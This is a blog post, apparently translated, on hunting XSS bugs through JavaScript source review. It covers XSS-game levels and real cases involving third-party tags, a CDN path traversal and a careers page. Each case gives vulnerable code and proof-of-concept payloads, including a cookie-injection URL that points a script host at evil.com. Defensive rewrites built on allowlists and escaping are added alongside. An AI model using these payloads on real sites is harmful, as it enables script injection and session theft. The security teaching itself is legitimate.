Vulnerability hunting through JavaScript source code analysis
langu_xyz

1. XSS triggered through the src of a script tag

code:

<script>
  function setInnerText(element, value) {
    if (element.innerText) {
      element.innerText = value;
    } else {
      element.textContent = value;
    }
  }
  function includeGadget(url) {
    var scriptEl = document.createElement('script');
    // This will totally prevent us from loading evil URLs!
    if (url.match(/^https?:\/\//)) {
      // The regex check can be bypassed with a different letter case, among other tricks
      setInnerText(document.getElementById("log"),
                   "Sorry, cannot load a URL containing \"http\".");
      return;
    }
    // Load this awesome gadget
    scriptEl.src = url;
    // Show log messages
    scriptEl.onload = function() {
      setInnerText(document.getElementById("log"),
                   "Loaded gadget from " + url);
    }
    scriptEl.onerror = function() {
      setInnerText(document.getElementById("log"),
                   "Couldn't load gadget from " + url);
    }
    document.head.appendChild(scriptEl);
    // Resulting element: <script src="data:text/javascript,alert('1')"></script>
  }
  // Take the value after # and use it as the gadget filename.
  function getGadgetName() {
    // Reads the page's hash value, which is set by navigating to a crafted URL
    return window.location.hash.substr(1) || "/static/gadget.js";
    // e.g. data:text/javascript,alert('1')
  }
  includeGadget(getGadgetName());
  // Extra code so that we can communicate with the parent page
  window.addEventListener("message", function(event){
    if (event.source == parent) {
      includeGadget(getGadgetName());
    }
  }, false);
</script>
</head>
<body id="level6">
  <img src="/static/logos/level6.png">
  <img id="cube" src="/static/level6_cube.png">
  <div id="log">Loading gadget...</div>
</body>
</html>

POC:

1. data:text/javascript,alert('1')
2. Https://google.com/jsapi?callback=alert(1)

Thoughts:
To be analysed
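As an added example (not part of the original post or of the XSS game's own code), the following puts the level's blocklist check next to an allowlist built on the URL parser. It assumes the page's origin is the placeholder https://xss-game.example and that gadgets live under /static/; both are assumptions, not values from the page.

```javascript
// Added example, not from the original post: blocklist vs allowlist for a script src.
// PAGE_ORIGIN is an assumed placeholder for the origin the page is served from.
const PAGE_ORIGIN = "https://xss-game.example";

// The level's check, kept verbatim: it only rejects strings that start with
// lower-case http:// or https://, so data: URLs and "Https://" slip through.
function vulnerableCheckRejects(url) {
  return /^https?:\/\//.test(url);
}

// Allowlist: resolve the value against the page origin with the real URL parser,
// then require same origin, a path under /static/ and a .js filename.
// Parsing normalises scheme case and collapses ".." segments before the checks run.
function isAllowedGadgetUrl(input) {
  let u;
  try {
    u = new URL(String(input), PAGE_ORIGIN + "/");
  } catch (e) {
    return false; // unparseable input is never loaded
  }
  if (u.origin !== PAGE_ORIGIN) return false;           // data:, Https://other-host, //other-host
  if (!u.pathname.startsWith("/static/")) return false; // /static/../admin.js normalises to /admin.js
  if (!u.pathname.endsWith(".js")) return false;
  return true;
}

// Safe replacement for the decision inside includeGadget(): returns the href
// that would be assigned to scriptEl.src, or null when the value is refused.
// Returning a value instead of touching the DOM keeps the decision testable.
function gadgetSrcFor(hashValue) {
  const candidate = hashValue || "/static/gadget.js";
  return isAllowedGadgetUrl(candidate) ? new URL(candidate, PAGE_ORIGIN + "/").href : null;
}

// Constructed probe inputs: the two PoCs from the post plus a few variants.
const GADGET_PROBES = [
  "data:text/javascript,alert('1')",
  "Https://google.com/jsapi?callback=alert(1)",
  "//google.com/jsapi?callback=alert(1)",
  "/static/../admin.js",
  "/static/gadget.js",
];

// One row per probe: what the original blocklist says, and what the allowlist says.
function summary() {
  return GADGET_PROBES.map(p => ({
    input: p,
    blocklistRejects: vulnerableCheckRejects(p),
    allowlistAccepts: isAllowedGadgetUrl(p),
  }));
}
```

The point of the comparison is that the original check tries to name the bad cases and misses two of them, while the allowlist names the single good shape (same origin, under /static/, ends in .js) and refuses everything else without needing to know about data: or letter case.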

2. XSS caused by regex matching of a resource file URL

code:

(function() {
  var k = document.createElement('script'); // create the script tag
  k.type = 'text/javascript';
  k.async = true;
  k.setAttribute("data-id", u.pubid); // u is the tag's config object, defined outside this snippet
  k.className = "kxct";
  k.setAttribute("data-version", "1.9");

  // read the kxsrc parameter from location.href
  var m, src = (m = location.href.match(/\bkxsrc=([^&]+)/)) && decodeURIComponent(m[1]);

  // check whether the kxsrc value matches the regex; if it does, load it, otherwise load the default JS file
  k.src = /^https?:\/\/([a-z0-9-.]+.)?krxd.net(:\d{1,5})?\/controltag\//i.test(src) ? src : src === "disable" ? "" : (location.protocol === "https:" ? "https:" : "http:") + "//cdn.krxd.net/controltag?confid=" + u.pubid;
  var s = document.getElementsByTagName('script')[0];
  s.parentNode.insertBefore(k, s);
})();

POC:

/^https?:\/\/([a-z0-9-.]+.)?krxd.net(:\d{1,5})?\/controltag\//i.test('https://a.bkrxd.net/controltag/evil.js')

FIXED:

/^https?:\/\/([a-z0-9-\.]+\.)?krxd\.net(:\d{1,5})?\/controltag\//i.test('https://krxd.net/controltag/evil.js')

Thoughts:

When you meet user-controllable input, try to bypass the regex.
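As an added example (not the tag vendor's code), the two regexes from this section are placed side by side with a hostname check done on a parsed URL, and run over constructed candidates including the post's bypass. The lookalike hostnames are constructed for the example.

```javascript
// Added example, not from the tag vendor's code: the post's two regexes next to
// a hostname check done on a parsed URL.

// Original check: the dots are unescaped, so "." matches any character.
const WEAK_RE = /^https?:\/\/([a-z0-9-.]+.)?krxd.net(:\d{1,5})?\/controltag\//i;
// Fixed check from the post: every dot escaped.
const FIXED_RE = /^https?:\/\/([a-z0-9-\.]+\.)?krxd\.net(:\d{1,5})?\/controltag\//i;

// Parser-based allowlist: let the URL parser split the string, then compare the
// hostname exactly (apex or a subdomain) and require the expected path prefix.
// u.hostname is already lower-cased and carries no port or userinfo.
function isAllowedControlTag(src) {
  let u;
  try {
    u = new URL(String(src));
  } catch (e) {
    return false;
  }
  if (u.protocol !== "https:" && u.protocol !== "http:") return false;
  const host = u.hostname;
  const hostOk = host === "krxd.net" || host.endsWith(".krxd.net");
  return hostOk && u.pathname.startsWith("/controltag/");
}

// Verdict of all three checks for one candidate src.
function classify(src) {
  return {
    weak: WEAK_RE.test(src),
    fixed: FIXED_RE.test(src),
    parsed: isAllowedControlTag(src),
  };
}

// Constructed candidates: the post's bypass, legitimate hosts, and lookalikes.
const CANDIDATES = [
  "https://a.bkrxd.net/controltag/evil.js",               // bypass from the post
  "https://cdn.krxd.net/controltag/confid=1",             // legitimate
  "https://krxdXnet/controltag/x.js",                     // the unescaped dot matches "X"
  "https://cdn.krxd.net.attacker.example/controltag/x.js", // suffix lookalike
  "https://cdn.krxd.net:8443/controltag/x.js",            // legitimate, with a port
  "https://cdn.krxd.net/other/x.js",                      // right host, wrong path
];

// Table of verdicts, one row per candidate.
function verdicts() {
  return CANDIDATES.map(c => ({ src: c, ...classify(c) }));
}
```

Escaping the dots closes the hole the post found; comparing a parsed hostname against an exact suffix is the form that stays correct when someone later edits the pattern, because there is no regex metacharacter left to forget.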

code:

idrCall: function() {
  var a, b;
  return this.idrCallPending ? void 0 : (this.log("making idr call"),
    // the JSONP host is this.rfiServer when set, otherwise the default
    a = this.rfiServer ? this.rfiServer : "a.rfihub.com",
    b = this.getProtocol() + "//" + a + "/idr.js",
    this.jsonpGet(b, {}, this.idrCallback, "cmZpSWRJbkNhY2hl"),
    this.idrCallPending = !0)
},

// elsewhere in the same script: this.rfiServer is populated from the _rfiServer cookie
a = this.readCookie("_rfiServer"),
null != a && this.setRfiServer(a),

POC:

1. CRLF injection
2. Subdomain XSS used to write the cookie

1
2
3
https://<redacted>.test.com/<redacted>?
email=aaa"%20type%3d"image"%20src%3d1%20o>nerror%3d"eval(decodeURIComponent(location.hash.substr(1)))
#document.cookie='_rfiServer=evil.com;domain=.uber.com;expires=Sat, 27 Jan 2999 01:43:57 GMT;path=/';location.href="https://get.test.com";

Tips:

1. If the output lands inside a tag and " is not filtered, a payload like type="image" src="1" onerror="alert(1)" can be used
2. When < and > are filtered, that can be used to bypass the XSS auditor, e.g. oner<ror

Thoughts:

First check whether the value is generated dynamically; if it is, check whether it is directly controllable; if not, think about how to build an attack chain that controls it indirectly.
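As an added example (not the tracker's code), the following shows the defensive counterpart of this chain: a cookie is not a trust boundary, since any host under the parent domain can set it, so a server name read from a cookie has to be validated against the expected domain before it becomes a script URL. The default host and cookie name are the ones quoted above; the cookie strings are constructed inputs.

```javascript
// Added example, not the tracker's own code: derive the JSONP host from the
// _rfiServer cookie only when it is a single label under the expected domain,
// otherwise fall back to the default host quoted in the post.
const DEFAULT_RFI_SERVER = "a.rfihub.com";

// One DNS label (1-63 chars, no leading/trailing hyphen) followed by .rfihub.com,
// anchored at both ends so nothing can be appended after the expected suffix.
const RFI_SERVER_RE = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.rfihub\.com$/i;

// Minimal cookie-header reader: returns the raw value of `name`, or null.
function readCookie(cookieHeader, name) {
  for (const part of String(cookieHeader).split(";")) {
    const [key, ...rest] = part.trim().split("=");
    if (key === name) return rest.join("=");
  }
  return null;
}

// The cookie value is attacker-influenced (subdomain XSS, CRLF injection, or a
// sibling application on the parent domain), so it is validated, not trusted.
function resolveRfiServer(cookieHeader) {
  const raw = readCookie(cookieHeader, "_rfiServer");
  if (raw === null) return DEFAULT_RFI_SERVER;
  return RFI_SERVER_RE.test(raw) ? raw.toLowerCase() : DEFAULT_RFI_SERVER;
}

// Same URL shape as the original idrCall(), built from the validated host.
function buildIdrUrl(cookieHeader, protocol = "https:") {
  return protocol + "//" + resolveRfiServer(cookieHeader) + "/idr.js";
}
```

Because the pattern is anchored and requires exactly one label, values such as evil.com, a.rfihub.com.attacker.example or a.rfihub.com@attacker.example all fall back to the default instead of being spliced into the script URL.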

Hijack the JS file of a third-party CDN

code:

https://tags.tiqcdn.com/utag/uber/main/prod/utag.js

POC:

1. The third-party CDN allows individual users to upload.
2. Upload your own JS and observe its path /data/utui/data/accounts/evilaccount/templates/main/201804081230/utag.js next to the target path /data/utui/data/accounts/uber/templates/main/utag.js.
3. Look for a path traversal vulnerability and construct the payload 201804081230/../../../../<victimaccount>/templates/main.
4. /data/utui/data/accounts/evilaccount/templates/main/201804081230/../../../../<victimaccount>/templates/main/utag.js == /data/utui/data/accounts/<victimaccount>/templates/main/utag.js

Approach:

When a third-party resource is used, think about whether you can control it.
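As an added example (not the CDN's code), this is the server-side containment check that would have stopped the traversal above: the client-supplied path is normalised segment by segment and any ".." that would climb out of the uploading account's directory is rejected outright. The accounts root is the prefix quoted in the post; the account names are constructed placeholders, and the function assumes it receives the already URL-decoded path.

```javascript
// Added example, not the CDN's code: keep an upload path inside the uploading
// account's directory. ACCOUNTS_ROOT is the prefix quoted in the post; the
// account names used below are constructed placeholders.
const ACCOUNTS_ROOT = "/data/utui/data/accounts";

// Normalise a client-supplied relative path segment by segment. A ".." that
// would climb above the account root is rejected rather than clamped, so a
// traversal attempt is visible as a null result and can be logged. Assumes the
// caller has already URL-decoded the path once.
function containedTemplatePath(account, requested) {
  if (!/^[a-z0-9_-]+$/i.test(account)) return null; // account id is one plain label
  if (/[\0\\]/.test(requested)) return null;          // NUL and backslashes are never valid here
  const stack = [];
  for (const seg of String(requested).split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") {
      if (stack.length === 0) return null; // would leave accounts/<account>/
      stack.pop();
      continue;
    }
    stack.push(seg);
  }
  if (stack.length === 0) return null;
  return ACCOUNTS_ROOT + "/" + account + "/" + stack.join("/");
}

// Constructed inputs: a normal upload path and the traversal shape from the post.
const NORMAL_PATH = "templates/main/201804081230/utag.js";
const TRAVERSAL_PATH = "templates/main/201804081230/../../../../otheraccount/templates/main/utag.js";

// Evaluate both against the uploading account.
function demo(account) {
  return {
    normal: containedTemplatePath(account, NORMAL_PATH),
    traversal: containedTemplatePath(account, TRAVERSAL_PATH),
  };
}
```

Resolving the path first and then checking that the result still starts with the account directory (trailing slash included) is the equivalent check when a real filesystem path library is used; the important property in both forms is that the comparison happens after normalisation, not on the raw string.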

XSS by controlling the parameter passed to an event handler

code:

<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />
    <script>
      function startTimer(seconds) {
        seconds = parseInt(seconds) || 3;
        setTimeout(function() {
          window.confirm("Time is up!");
          window.history.back();
        }, seconds * 1000);
      }
    </script>
  </head>
  <body id="level4">
    <img src="/static/logos/level4.png" />
    <br>
    <img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
    <br>
    <div id="message">Your timer will execute in {{ timer }} seconds.</div>
  </body>
</html>

POC:

1. ');alert('1

2. <img src="/static/loading.gif" onload="startTimer('{{ ');alert('1 }}');" />

Approach:

Look at where the controllable point sits; if it is inside a tag, try to bypass, and analyse the value first.
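As an added example (not from the XSS game), the template shape from this level is rendered two ways: the vulnerable inline-handler form, and a form that coerces the parameter to an integer and keeps it out of any script context. The substitution of {{ timer }} happens before any JavaScript runs, so the level's own parseInt() cannot help; the fix belongs where the markup is produced.

```javascript
// Added example, not from the XSS game: the vulnerable template next to a safe one.

// Vulnerable shape from the level: untrusted text dropped into a JS string
// inside an inline event handler. A value of ');alert('1 closes the string
// and the call, then appends a second statement.
function renderTimerVulnerable(timer) {
  return '<img src="/static/loading.gif" onload="startTimer(\'' + timer + '\');" />';
}

// Coerce the parameter to what it is supposed to be: a positive integer.
// Mirrors the level's own parseInt(seconds) || 3 default.
function coerceSeconds(input) {
  const n = Number.parseInt(String(input), 10);
  return Number.isInteger(n) && n > 0 ? n : 3;
}

// Safe shape: no inline handler at all. Only the coerced integer reaches the
// markup, in a data attribute, and the listener is attached from script.
function renderTimerSafe(timer) {
  return '<img src="/static/loading.gif" data-seconds="' + coerceSeconds(timer) + '" />';
}

// Reader side: the listener reads the data attribute and coerces again, so
// even a hand-edited attribute value can only ever become a number.
function secondsFromDataset(dataset) {
  return coerceSeconds(dataset && dataset.seconds);
}
```

In the page, the listener would be attached with document.querySelector('img[data-seconds]').addEventListener('load', e => startTimer(secondsFromDataset(e.target.dataset))), which also lets the page drop inline event handlers entirely and ship a CSP without 'unsafe-inline'.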

XSS through an href attribute

code:

<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />
  </head>
  <body id="level5">
    <img src="/static/logos/level5.png" /><br><br>
    <!-- We're ignoring the email, but the poor user will never know! -->
    Enter email: <input id="reader-email" name="email" value="">
    <br><br>
    <a href="{{ next }}">Next >></a>
  </body>
</html>

POC:

1. javascript:alert(1)
2. <a href="javascript:alert(1)">Next >></a>

Thoughts:

Remember the javascript:alert(1) trick; wherever the value is controllable there is bound to be XSS.
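As an added example (not from the XSS game), this is the check a page should apply to a "next" value before writing it into an href. It relies on the URL parser, which lower-cases the scheme and strips the whitespace and embedded tabs or newlines that defeat a naive prefix comparison, and then allows only http(s) links on the page's own origin. The origin https://xss-game.example is an assumed placeholder.

```javascript
// Added example, not from the XSS game: validate a "next" link before it is
// written into an href. SITE_ORIGIN is an assumed placeholder for the page origin.
const SITE_ORIGIN = "https://xss-game.example";

// Resolve the value with the URL parser (scheme lower-cased, leading/trailing
// whitespace stripped, embedded tabs and newlines removed), then allow only
// http(s) links on the page's own origin. Anything else falls back to the site
// root, so javascript:, data: and off-site redirects never reach the attribute.
function safeNextUrl(next, origin = SITE_ORIGIN) {
  const fallback = origin + "/";
  if (typeof next !== "string") return fallback;
  let u;
  try {
    u = new URL(next, origin + "/");
  } catch (e) {
    return fallback;
  }
  if (u.protocol !== "https:" && u.protocol !== "http:") return fallback;
  if (u.origin !== origin) return fallback; // also closes the open-redirect case
  return u.href;
}

// Constructed probes: the PoC from the post plus obfuscated variants that a
// naive startsWith("javascript:") check would miss.
const LINK_PROBES = [
  "javascript:alert(1)",
  "JaVaScRiPt:alert(1)",
  " \t javascript:alert(1)",
  "java\nscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "//attacker.example/",
];

// True when every probe is replaced by the site root.
function allProbesFallBack() {
  return LINK_PROBES.every(p => safeNextUrl(p) === SITE_ORIGIN + "/");
}
```

The returned href still has to be HTML-attribute-encoded when it is written into the template; the scheme check and the encoding address two different ways out of the attribute and neither replaces the other.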

DOM XSS caused by URL concatenation

code:

//Checking for potential Lever source or origin parameters
var pageUrl = window.location.href;
var leverParameter = '';
var trackingPrefix = '?lever-'

if( pageUrl.indexOf(trackingPrefix) >= 0){
  // Found Lever parameter
  // location.href includes the fragment, so everything after ?lever- (a #... part included) lands in link unencoded
  var pageUrlSplit = pageUrl.split(trackingPrefix);
  leverParameter = '?lever-'+pageUrlSplit[1];
}
var link = posting.hostedUrl+leverParameter;

jQuery('#jobs-container .jobs-list').append(
  '<div class="job '+teamCleanString+' '+locationCleanString.replace(',', '')+' '+commitmentCleanString+'">' +
    '<a class="job-title" href="'+link+'"">'+title+'</a>' +
    '<p class="tags"><span>'+team+'</span><span>'+location+'</span><span>'+commitment+'</span></p>' +
    '<p class="description">'+shortDescription+'</p>' +
    '<a class="btn" href="'+link+'">Learn more</a>' +
  '</div>'
);

POC:
1. https://www.test.com/careers?lever-#aaa"><script src="data:text/javascript,alert('1')"></script>
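As an added example (not Lever's code), the extraction above is rewritten on top of the URL parser and the result is encoded before it is concatenated into markup; the original split-based extraction is kept alongside for comparison. The hosted URL and the job title are constructed inputs; the page URL is the PoC from the post.

```javascript
// Added example, not Lever's code: extract the lever-* parameters with the URL
// parser and encode the result before it is concatenated into markup.

// Shape of the original extraction: split location.href on "?lever-" and keep
// everything after it, fragment included, with no encoding.
function leverParameterVulnerable(pageUrl) {
  const trackingPrefix = "?lever-";
  if (pageUrl.indexOf(trackingPrefix) < 0) return "";
  return trackingPrefix + pageUrl.split(trackingPrefix)[1];
}

// Parser-based extraction: only query parameters whose name starts with "lever-"
// are kept; the fragment is never part of searchParams, and URLSearchParams
// percent-encodes names and values on output.
function leverParameterSafe(pageUrl) {
  let u;
  try {
    u = new URL(pageUrl);
  } catch (e) {
    return "";
  }
  const kept = new URLSearchParams();
  for (const [name, value] of u.searchParams) {
    if (name.startsWith("lever-")) kept.append(name, value);
  }
  const qs = kept.toString();
  return qs ? "?" + qs : "";
}

// Minimal HTML encoder, sufficient for text nodes and double-quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  }[c]));
}

// Build the job-title anchor the way the original does, but with encoding at
// the point where each untrusted piece enters the markup.
function renderJobLink(hostedUrl, pageUrl, title) {
  const link = hostedUrl + leverParameterSafe(pageUrl);
  return '<a class="job-title" href="' + escapeHtml(link) + '">' + escapeHtml(title) + "</a>";
}

// The PoC page URL from the post (payload carried in the fragment).
const POC_URL = "https://www.test.com/careers?lever-#aaa\"><script src=\"data:text/javascript,alert('1')\"></script>";
```

Either change alone would have stopped this PoC (the parser drops the fragment; the encoder neutralises the quote and angle brackets), but they fix different problems: the parser makes the extraction mean what the comment says it means, and the encoder protects the sink whatever the extraction returns. Building the elements with document.createElement and textContent instead of string concatenation removes the sink altogether.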

  • Post title:JavaScript源码分析漏洞挖掘
  • Post author:langu_xyz
  • Create time:2018-03-22 21:00:00
  • Post link:https://blog.langu.xyz/JavaScript源码分析漏洞挖掘/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.